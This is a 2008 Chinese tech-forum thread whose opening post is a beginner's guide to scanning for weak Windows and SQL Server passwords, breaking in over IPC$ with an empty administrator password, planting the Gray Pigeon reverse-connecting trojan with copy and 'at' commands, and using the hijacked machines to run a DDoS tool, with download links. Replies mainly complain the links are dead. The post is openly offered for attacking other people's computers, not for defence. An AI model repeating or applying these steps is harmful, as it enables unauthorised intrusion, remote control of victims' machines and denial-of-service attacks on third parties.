文本版|topic 高级搜索
   名人堂 帮助 论坛制度 意见反馈 | 首页 博客 周新贴 招聘 专题 新闻
 RSS 底部
 
社区导航: 专家门诊   网络技术   操作系统   数据库   程序设计   系统应用   考试认证   CIO及信息化   站长交流   综合交流   下载基地  51CTO产品服务 设为首页 | 收藏本站
51CTO技术论坛» 网络安全 » 新手请看:扫描+入侵+攻击       [ 打印]  [ 订阅]  [ 收藏]  [ 推荐给朋友]   [ 本帖文本页]
 

论坛跳转:
     
标题: [入侵分析] 新手请看:扫描+入侵+攻击  ( 查看:764  回复:11 )   
 
zhirumuma
新新人类  点击可查看详细



帖子 20
精华 0
无忧币 -2
积分 100
阅读权限 20
注册日期 2008-1-26
最后登录 2008-5-27 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-1-26 19:08   标题:新手请看:扫描+入侵+攻击
上一帖 |
新手请看:扫描+入侵+攻击

这是我写的第一篇原创的帖子,我虽然很菜,但我把我知道拿出来与大家分享;这篇文章虽然很简单,但我觉得很实用。如果有什么不对的地方和好的建议请大家提出并指正。
一、扫描
扫描软件在网络上很多,功能也各一,在这里我推荐大家用X-scan2.0,下载地http://www.ttian.net/download/show.php?id=473
下载解压后,运行x-scan-gui,在“扫描模块”里只选“NT-server弱口令“和“SQL-server弱口令”这两项;在“扫描参数”里“基本设置”选项设置你要扫描的IP地址;在“端口相关设置”里“待检测端口”输入你要扫描的端口,在这里可以只扫描1433和3389这两个端口,其它的不变。一切准备好后就开始扫描,要不了多久就会出现结果。
二、入侵
在这里我们要用到一个木马,我推荐大家用“灰鸽子”,它是一个反弹性木马,具有自动上线连接的功能,当中木马机器的IP地址变了时也会自动上线连接。
下载地http://www.ttian.net/download/show.php?id=446
下载解压后有p-client.exe(在自己的机器上运行的客户端程序)和server.exe(在肉鸡上运行的程序)。我们要让对方运行server.exe程序(记住这个程序不要在自己的机器上运行哟)。在让对方运行server.exe程序之前先配置server.exe程序(注意如果不配置这个程序即使对方运行了我们上传上去的server.exe程序,我们也不能和他连接)。具体配置server的方http://www.ttian.net/article/show.php?id=357
比如我们刚才扫描到一台IP为61.216.216.216的主机,Administrator密码为空。我们要利用刚才扫描得到的NT弱口令,再用IPC$管道来连接。具体如下:
1、先和对方主机建立连接,操作如下:
net use \61.216.216.216\ipc$ "" /user:"administrator"
2、拷贝木马程序到对方的机器的C盘下,操作如下:
copy server.exe \61.216.216.216\c$
3、查看对方时间,操作如下:
net time \61.216.216.216
4、假设对方的时间为下午1:23,让对方机器在13:25运行木马程序,操作如下:
at \61.216.216.216 13:25 c:\server.exe(注意对方的时间为12小时制,我们用AT命令时要转换为24小时制,让对方运行木马的时间最好比对方机器的当前时间多几分钟)
5、查看木马程序是否运行,操作如下:
at \61.216.216.216
如果清单为空,说明木马已运行了,这时我们可以在自己的机器上运行p-client.exe,刚才中了木马的机器就会自动来连接。
三、攻击
我写这篇文章的主要目的就是它。我们在这里要用到的一个攻击软件叫“独裁者”,它是一个采用的是分布式拒绝服务攻击的软件,下载下地http://www.leothreads.com/usr/25/25_18196.zip
“独裁者”的使用教程:
http://www.s8s8.net/cgi-bin/topi ... ic=17639&show=0
我们要让肉鸡运行“独裁者”的server.exe程序。
在木马“灰鸽子”里进入IP为61.216.216.216的主机的C盘,点右键“文件上传自”找到“独裁者”的server.exe点打开既可。当程序上传完后点刷新就可以看到我们刚才上传的server.exe文件了。右键点server.exe选“远程打开”“隐藏运行”,过一会我们就可以在
“独裁者”里加61.216.216.216这个IP了。
也许有人要问:“就是为什么我们要让对方对行木马,我们不可以直接在DOS下上传“独裁者”的server.exe文件并上它运行就行了吗?
在这里我要说的就是“独裁者”没有自动连接的功能,如果肉鸡不是固定的IP,哪肉鸡就只能用一次,因为肉鸡原来哪个IP变了呀!这里的木马就有自动上线连接IP的功能,即使肉鸡的IP变了也能和连接。这样肉鸡就飞不了啦!嘿嘿!
其实这个的木马还有很多功能,比如可以用来作代理、查看对方屏幕、记录密码等,这就要你自己去慢慢探索吧。
以上全部在WIN2000里通过,如果大家有什么问题和好的建议请跟帖,谢谢!

网络工程师到底该不该去考CCIE认证?
2008-1-26 19:081楼
[ 顶部 ]
 
xjl520
技术员  点击可查看详细



帖子 410
精华 0
无忧币 691
积分 472
阅读权限 30
注册日期 2007-9-17
最后登录 2008-7-3 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-1-26 19:50 
你给的网址都打不开呀

网络工程师到底该不该去考CCIE认证?
2008-1-26 19:502楼
[ 顶部 ]
 
nxns
新新人类  点击可查看详细



帖子 4
精华 0
无忧币 9
积分 15
阅读权限 20
注册日期 2005-12-22
最后登录 2008-4-30 离线

[查看资料]  [发短消息]  [Blog
[个人主页]    QQ       
发表于:2008-1-27 08:56 
网站打不开呀

网络工程师到底该不该去考CCIE认证?
2008-1-27 08:563楼
[ 顶部 ]
 
风蚀的记忆
新新人类  点击可查看详细



帖子 22
精华 0
无忧币 32
积分 22
阅读权限 20
注册日期 2008-1-15
最后登录 2008-1-27 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-1-27 21:34 
学习了,就是打不开...........

网络工程师到底该不该去考CCIE认证?
2008-1-27 21:344楼
[ 顶部 ]
 
sh-fluke
新新人类  点击可查看详细



帖子 138
精华 0
无忧币 4
积分 138
阅读权限 20
注册日期 2007-10-19
最后登录 2008-5-20 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-1-29 08:55 
好东西,谢谢拉。很好的。

网络工程师到底该不该去考CCIE认证?
2008-1-29 08:555楼
[ 顶部 ]
 
allrelax
新新人类  点击可查看详细



帖子 76
精华 0
无忧币 1807
积分 124
阅读权限 20
注册日期 2007-5-14
最后登录 2008-7-2 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-1-31 13:56 
网站打不开

网络工程师到底该不该去考CCIE认证?
2008-1-31 13:566楼
[ 顶部 ]
 
Jasonzhang345
新新人类  点击可查看详细



帖子 5
精华 0
无忧币 20
积分 5
阅读权限 20
注册日期 2008-2-1
最后登录 2008-7-2 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-2-1 19:43   标题:打不开
内容还好就是打不开你给的那些连接!

网络工程师到底该不该去考CCIE认证?
2008-2-1 19:437楼
[ 顶部 ]
 
kingerwt
新新人类  点击可查看详细


帖子 20
精华 0
无忧币 34
积分 20
阅读权限 20
注册日期 2008-2-1
最后登录 2008-5-6 离线

[查看资料]  [发短消息]  [Blog
    ICQ 状态     
发表于:2008-2-1 22:51 
恩,我也打不开!

网络工程师到底该不该去考CCIE认证?
2008-2-1 22:518楼
[ 顶部 ]
 
bubble4629
新新人类  点击可查看详细



帖子 7
精华 0
无忧币 67
积分 15
阅读权限 20
注册日期 2008-2-2
最后登录 2008-5-13 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-2-2 13:42   标题:哈哈
学习了,但是太容易了,不过还是谢谢

网络工程师到底该不该去考CCIE认证?
2008-2-2 13:429楼
[ 顶部 ]
 
cllovy
新新人类  点击可查看详细



帖子 70
精华 0
无忧币 35
积分 70
阅读权限 20
注册日期 2008-2-3
最后登录 2008-2-14 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-2-14 20:22 
顶起

网络工程师到底该不该去考CCIE认证?
2008-2-14 20:2210楼
[ 顶部 ]
 
clevercong
新新人类  点击可查看详细



帖子 41
精华 0
无忧币 305
积分 57
阅读权限 20
注册日期 2008-2-1
最后登录 2008-4-22 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-2-15 17:54 
没技术含量啊,都是用别人整好的东西。

网络工程师到底该不该去考CCIE认证?
2008-2-15 17:5411楼
[ 顶部 ]
 
xujun2008
新新人类  点击可查看详细



帖子 30
精华 0
无忧币 16
积分 30
阅读权限 20
注册日期 2008-2-29
最后登录 2008-5-10 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-2-29 11:40 
dddddddddddddddd

网络工程师到底该不该去考CCIE认证?
2008-2-29 11:4012楼
[ 顶部 ]
     
论坛跳转:  

| | |
| | |
| | |
标记已读 · 删除论坛Cookies · 文本版 · WAP
 
| 诚征版主 | 版主堂 | 意见建议 | 大史记 | 论坛地图
Copyright©2005-2008 51CTO.COM  Powered by Discuz!
本论坛言论纯属发布者个人意见,不代表51CTO网站立场!如有疑义,请与管理员联系。
京ICP备05051492号